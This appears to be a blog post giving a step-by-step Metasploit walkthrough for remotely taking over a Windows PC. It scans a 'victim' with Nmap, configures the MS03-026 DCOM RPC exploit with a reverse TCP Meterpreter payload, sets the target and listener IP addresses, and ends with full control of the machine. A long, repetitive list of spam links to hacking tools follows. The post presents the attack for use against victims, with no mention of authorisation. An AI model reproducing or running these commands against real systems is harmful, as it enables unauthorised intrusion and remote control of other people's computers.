sexta-feira, 19 de janeiro de 2024

HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.

Related posts


  1. Hack Tool Apk
  2. Pentest Tools Review
  3. Hack Tools For Ubuntu
  4. Top Pentest Tools
  5. Pentest Tools Subdomain
  6. Pentest Tools For Mac
  7. Pentest Tools Open Source
  8. Hacker Tools Github
  9. Hacker
  10. Hack Tools
  11. Hack Tools Github
  12. Hack Tools For Pc
  13. Best Pentesting Tools 2018
  14. Hacker Search Tools
  15. Top Pentest Tools
  16. Kik Hack Tools
  17. Hack Tools Download
  18. Hack Tools Mac
  19. Hacker Tools Windows
  20. Hacking Tools For Mac
  21. Hacking Tools For Pc
  22. Hacks And Tools
  23. Pentest Tools Nmap
  24. Hacking Tools Github
  25. Hacker Tools
  26. Hacks And Tools
  27. Hack And Tools
  28. Nsa Hack Tools
  29. New Hack Tools
  30. Hacking Tools For Beginners
  31. Pentest Tools Open Source
  32. Hacking Tools Download
  33. Hacker Security Tools
  34. World No 1 Hacker Software
  35. What Is Hacking Tools
  36. Hack Tools
  37. Pentest Tools Find Subdomains
  38. Pentest Tools Download
  39. Pentest Reporting Tools
  40. Top Pentest Tools
  41. Hacker Tools For Mac
  42. Hacker Security Tools
  43. Kik Hack Tools
  44. Pentest Tools Website
  45. Hacking Tools Software
  46. Hack App
  47. Hacking Tools 2019
  48. Hacking Tools For Pc
  49. Pentest Tools Online
  50. Hacker Tools Linux
  51. Hacker Search Tools
  52. Hack Tools Github
  53. Nsa Hacker Tools
  54. Hacker Search Tools
  55. Best Pentesting Tools 2018
  56. Hacking Tools For Beginners
  57. Pentest Tools For Ubuntu
  58. Pentest Tools Framework
  59. New Hacker Tools
  60. Hacker Security Tools
  61. Nsa Hacker Tools
  62. Pentest Tools Subdomain
  63. Hacking Tools Name
  64. Usb Pentest Tools
  65. Hacker Security Tools
  66. Hacker Tools Mac
  67. Beginner Hacker Tools
  68. Hacking Tools Windows
  69. Hacking Tools Software
  70. Pentest Tools Nmap
  71. Tools Used For Hacking
  72. Pentest Tools Website Vulnerability
  73. Hack And Tools
  74. Hacking Tools Github
  75. Pentest Tools For Ubuntu
  76. Pentest Tools Free
  77. Bluetooth Hacking Tools Kali
  78. Hacking Tools 2019
  79. Hacker Tools Mac
  80. Hacking Tools 2019
  81. Hacker Tools Apk Download
  82. Hacking Tools Online
  83. Nsa Hack Tools Download
  84. Hacker Tools Free
  85. Hacking Tools Github
  86. Hack Tools For Windows
  87. Hacking Tools Pc
  88. Hacking Tools And Software
  89. Underground Hacker Sites
  90. Hacking Tools Mac
  91. Pentest Tools Online
  92. Pentest Tools Url Fuzzer
  93. Physical Pentest Tools
  94. Hack Tools For Games
  95. Pentest Tools
  96. Hacking Tools For Kali Linux
  97. World No 1 Hacker Software
  98. Pentest Tools Framework
  99. Pentest Tools Android
  100. Best Hacking Tools 2019
  101. Hacker Tools Free Download
  102. Hacker Tools For Mac
  103. Hacking Tools
  104. Pentest Tools Nmap
  105. Pentest Tools Port Scanner
  106. Hacking Tools Online
  107. Nsa Hacker Tools
  108. Hacking Tools For Windows 7

Nenhum comentário:

Postar um comentário